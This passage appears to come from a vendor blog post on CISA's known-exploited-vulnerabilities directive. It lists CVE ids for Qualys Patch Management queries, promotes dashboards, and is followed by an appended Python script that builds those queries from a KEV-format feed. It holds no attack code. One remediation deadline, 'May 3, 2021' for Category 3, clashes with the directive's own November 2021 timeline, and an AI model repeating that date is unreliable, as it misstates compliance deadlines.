VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most "Category 2" vulnerabilities by **November 17, 2021**, and "Category 3" by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help them comply with the directive's aggressive remediation date of November 17, 2021. 
Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not 
currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:['CVE-2021-1732','CVE-2020-1350','CVE-2020-1472','CVE-2021-26855','CVE-2021-26858','CVE-2021-27065','CVE-2020-0601','CVE-2021-26857','CVE-2021-22893','CVE-2020-8243','CVE-2021-22900','CVE-2021-22894','CVE-2020-8260','CVE-2021-22899','CVE-2019-11510']\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configuration changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical part of threat mitigation, but only a part. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. 
Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.

## Getting Started

Learn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).

Source: Qualys Blog, "Qualys Response to CISA Alert: Binding Operational Directive 22-01", published 2021-11-09, <https://blog.qualys.com/category/vulnerabilities-threat-research>.
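The two Patch Management queries above are hand-typed `cve:[...]` lists, and hand-typed lists are where duplicate ids and mangled quote characters creep in as the directive's catalogue grows. The following script is an added example, not Qualys or CISA code: it generates the same QQL exact-match query form from a JSON feed in the shape of CISA's published `known_exploited_vulnerabilities.json` (field names `cveID`, `vendorProject`, `product`, `dueDate`), splits the catalogue into past-due and upcoming entries by `dueDate`, and deduplicates and validates every id before rendering. `SAMPLE_KEV` is a constructed excerpt whose due dates are illustrative rather than the directive's real deadlines, and the `max_per_query` chunk size is a local readability choice, not a documented Qualys limit.

```python
"""Generate Qualys QQL `cve:[...]` queries from a CISA KEV-format feed.

Added example, not Qualys or CISA code. SAMPLE_KEV is a constructed excerpt
that mirrors only the field names of CISA's known_exploited_vulnerabilities.json
feed (cveID, vendorProject, product, dueDate); its due dates are illustrative,
not the directive's real deadlines.
"""
import json
import re

# Strict id shape: a typo would otherwise silently drop a patch from scope.
CVE_RE = re.compile(r"^CVE-\d{4}-\d{4,}$")

# Constructed sample in the KEV feed's shape; swap in the real feed from
# https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
SAMPLE_KEV = json.dumps({
    "title": "constructed KEV excerpt",
    "vulnerabilities": [
        {"cveID": "CVE-2021-26855", "vendorProject": "Microsoft", "product": "Exchange Server", "dueDate": "2021-11-17"},
        {"cveID": "CVE-2021-1732", "vendorProject": "Microsoft", "product": "Win32k", "dueDate": "2021-11-17"},
        {"cveID": "CVE-2020-1472", "vendorProject": "Microsoft", "product": "Netlogon", "dueDate": "2021-11-17"},
        {"cveID": "CVE-2021-40444", "vendorProject": "Microsoft", "product": "MSHTML", "dueDate": "2021-11-17"},
        {"cveID": "CVE-2021-22893", "vendorProject": "Pulse Secure", "product": "Pulse Connect Secure", "dueDate": "2021-11-17"},
        {"cveID": "CVE-2019-11510", "vendorProject": "Pulse Secure", "product": "Pulse Connect Secure", "dueDate": "2022-05-03"},
    ],
})


def load_catalog(raw: str) -> list:
    """Parse a KEV-format JSON document and return its vulnerability entries,
    rejecting any entry whose cveID is not a well-formed CVE identifier."""
    doc = json.loads(raw)
    entries = doc.get("vulnerabilities", [])
    for entry in entries:
        if not CVE_RE.match(entry.get("cveID", "")):
            raise ValueError(f"malformed cveID in feed: {entry.get('cveID')!r}")
    return entries


def partition_by_due_date(entries, today: str):
    """Split entries into (past_due, upcoming) lists of CVE ids relative to `today`.

    `today` and dueDate are ISO yyyy-mm-dd strings, so plain string comparison
    orders them correctly. Past due means the deadline is strictly before today.
    Both lists are sorted by due date, then id, so the earliest deadline comes first.
    """
    ordered = sorted(entries, key=lambda e: (e["dueDate"], e["cveID"]))
    past_due = [e["cveID"] for e in ordered if e["dueDate"] < today]
    upcoming = [e["cveID"] for e in ordered if e["dueDate"] >= today]
    return past_due, upcoming


def qql_cve_query(cve_ids) -> str:
    """Render a Qualys QQL exact-match query of the form cve:[`CVE-...`,`CVE-...`].

    Duplicates are dropped while keeping first-seen order (hand-typed lists
    often repeat ids), and malformed ids raise rather than shrinking the patch
    set silently.
    """
    seen, ordered = set(), []
    for cve in cve_ids:
        if not CVE_RE.match(cve):
            raise ValueError(f"not a CVE id: {cve!r}")
        if cve not in seen:
            seen.add(cve)
            ordered.append(cve)
    if not ordered:
        raise ValueError("no CVE ids to query")
    return "cve:[" + ",".join(f"`{c}`" for c in ordered) + "]"


def build_queries(cve_ids, max_per_query: int = 50) -> list:
    """Split a long id list into several queries of at most max_per_query ids.

    Assumption: the chunk size is a local choice for keeping each query
    readable; it is not a documented Qualys query limit.
    """
    ids = list(dict.fromkeys(cve_ids))  # dedupe up front so chunking is deterministic
    return [qql_cve_query(ids[i:i + max_per_query]) for i in range(0, len(ids), max_per_query)]


if __name__ == "__main__":
    past_due, upcoming = partition_by_due_date(load_catalog(SAMPLE_KEV), today="2021-11-20")
    print("past due:", qql_cve_query(past_due))
    for query in build_queries(upcoming):
        print("upcoming:", query)
```

Point it at the real feed and a current date to regenerate both queries from the catalogue instead of maintaining them by hand; the past-due list is the one to paste into Patch Management first.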